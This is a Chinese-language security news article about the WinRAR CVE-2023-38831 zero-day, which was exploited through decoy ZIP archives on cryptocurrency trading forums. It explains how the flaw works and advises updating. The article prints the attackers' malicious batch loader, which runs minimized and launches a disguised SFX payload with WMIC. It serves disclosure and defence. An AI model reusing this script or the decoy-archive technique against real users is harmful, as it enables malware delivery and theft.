WinRAR再爆0 day漏洞

VSole2023-08-29 09:20:29

WinRAR再爆0 day漏洞,已被利用超过4个月。 

Winrar是一款免费的主流压缩文件解压软件,支持绝大部分压缩文件格式的解压,全球用户量超过5亿。Group-IB研究人员在分析DarkMe恶意软件时发现WinRAR在处理ZIP文件格式时的一个漏洞,漏洞CVE编号为CVE-2023-38831。攻击者利用该漏洞可以创建欺骗性扩展的诱饵文件来隐藏恶意脚本,即将恶意脚本隐藏在伪装为.jpg、.txt和其他文件格式的压缩文件中,并窃取用户加密货币账户。

研究人员在分析DarkMe恶意软件时发现了一些可疑的ZIP文件。Group-IB在8个加密货币交易的主流论坛上发现了这些恶意ZIP文件,如图1所示:

图1. 交易论坛发布的帖子

CVE-2023-38831漏洞序列图如图2所示:

图2. CVE-2023-38831漏洞序列图

所有压缩文件都是用同一方法创建的,结构相同,包括一个诱饵文件和一个包含恶意文件和未使用文件的文件夹。当用户打开恶意压缩文件后,受害者机会看到一个图像文件和一个相同文件名的文件夹,如图3所示。

图3. 恶意zip文件示例

如果受害者打开伪装为图像的诱饵文件,恶意脚本就会执行攻击的下一阶段,如图4所示:

图4. 攻击流程图

脚本的主要作用是进入攻击的下一阶段,这是通过运行最小化窗口来完成的。然后搜索两个特定文件“Screenshot_05-04-2023.jpg”和 “Images.ico”。JPG文件是受害者打开的图像,“Images.ico”是用来提取和启动新文件的SFX CAB压缩文件。恶意脚本示例如下:

@echo off

if not DEFINED IS_MINIMIZED

 set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit

 cd %TEMP%

 for /F "delims=" %%K in ('dir /b /s "Screenshot_05-04-2023.jpg"') do

  for /F "delims=" %%G in ('dir /b /s "Images.ico"') do

   WMIC process call create "%%~G" && "%%~K" && cd %CD% && exit

Exit

为了解漏洞工作原理,研究人员创建了2个与发现的恶意压缩文件结构相同的压缩文件。两个文件都包含图像文件,其中一个压缩文件中还包含一个存储脚本的内部文件夹,可以触发消息展示框。然后,研究人员修改了其中一个文件使其与恶意压缩文件一样。然后,比较WinRAR在解压不同压缩文件时的区别。

研究人员主要想确定在打开解压文件时会在%TEMP%/%RARTMPDIR%文件夹中创建什么文件。在原始的zip文件中,只会创建image.jpg文件。在恶意文件zip文件中,其中的文件夹内容也会被提取。

图5. 不同zip文件解压比较

也就是说,攻击发生在WinRAR尝试打开用户想要访问的文件时。ShellExecute函数接收到了打开文件的错误参数。图像文件名与搜索不匹配,引发其被跳过。然后就发现了批处理文件,并执行。

图6 漏洞复现

8月15日该漏洞被分配了CVE编号,但该漏洞从2023年4月开始就被在野利用。研究人员建议WinRAR用户更新到最新的v 6.23版本。

winrar解压软件
本作品采用《CC 协议》,转载必须注明作者和本文链接
[M78sec]Xss Flash钓鱼
2021-07-31 08:48:40
Xss Flash钓鱼
WinRAR再爆0 day漏洞
2023-08-29 09:20:29
Winrar是一款免费的主流压缩文件解压软件,支持绝大部分压缩文件格式的解压,全球用户量超过5亿。Group-IB研究人员在分析DarkMe恶意软件时发现WinRAR在处理ZIP文件格式时的一个漏洞,漏洞CVE编号为CVE-2023-38831。
研究人员在WinRAR中发现一个高危远程代码执行漏洞。Winrar是一款官方免费的rar文件压缩解压软件,支持绝大部分压缩文件格式的解压,用户量超过百万。研究人员在WinRAR软件解压缩过程中发现一个高危漏洞,漏洞CVE编号为CVE-2023-40477,CVSS 评分7.8分。攻击者利用该漏洞可在当前进程环境下执行任意代码。
红蓝对抗-反制
2021-10-22 07:09:44
蜜罐可以理解成互联网上的一台主机,它的作用是诱骗攻击者去对自己进行攻击,然后记录攻击者的攻击细节并生成对应的攻击者画像,是当前的一种比较主流的入侵检测系统也是一种主动防御系统。
Bleeping Computer 网站披露,某些网络犯罪分子正试图在 WinRAR解压档案中添加恶意功能,这些档案包含无害的诱饵文件,使其能够在不触发目标系统上安全代理的情况下设置后门。此外,威胁攻击者还添加了运行 PowerShell、命令提示符和任务管理器的指令。最后,研究人员建议用户应特别注意 SFX 档案,并使用适当的软件检查档案的内容。此后门将允许攻击者完全访问WordPress网站,无论是窃取数据还是安装其他恶意代码。
Bleeping Computer 网站披露,某些网络犯罪分子正试图在 WinRAR解压档案中添加恶意功能,这些档案包含无害的诱饵文件,使其能够在不触发目标系统上安全代理的情况下设置后门。攻击Crowdstrike 发现了一个网络犯罪分子使用窃取来的凭据滥用“utilman.exe”,将其设置为启动一个受密码保护的 SFX 文件,并且该文件之前已植入系统。此外,威胁攻击者还添加了运行 PowerShell、命令提示符和任务管理器的指令。最后,研究人员建议用户应特别注意 SFX 档案,并使用适当的软件检查档案的内容。
近日,国家信息安全漏洞库(CNNVD)收到关于WinRAR代码执行漏洞(CNNVD-201902-077、CVE-2018-20250)情况的报送。攻击者利用该漏洞可以进行远程代码执行攻击。WinRAR 5.70 Beta 1以下版本均受上述漏洞影响。目前,部分漏洞的验证工具已经公开,此外WinRAR官方已经发布更新修复了该漏洞,建议受该漏洞影响的WinRAR用户尽快采取修补措施。
我们最近发现流行软件的虚假安装程序被用来将恶意软件捆绑包传送到受害者的设备上。这些安装程序被广泛使用,诱使用户打开恶意文档或安装不需要的应用程序。 众所周知,在网络安全方面,用户的安全操作环节通常被认为是最薄弱的环节。这意味着它们成为攻击的入口并经常成为黑客的常见社会工程目标。通过终端用户,黑客再逐步地发起对企业的攻击。员工有时并不知道是否受到网络攻击,或者不熟悉网络安全最佳实践,而攻击者则确切
经过我们团队的持续研究,IBM Security X-Force 发现了证据,表明总部位于俄罗斯的网络犯罪集团“Trickbot 组织”自俄罗斯入侵以来一直在系统地攻击乌克兰——这是前所未有的转变,因为该组织以前没有针对乌克兰。
VSole
网络安全专家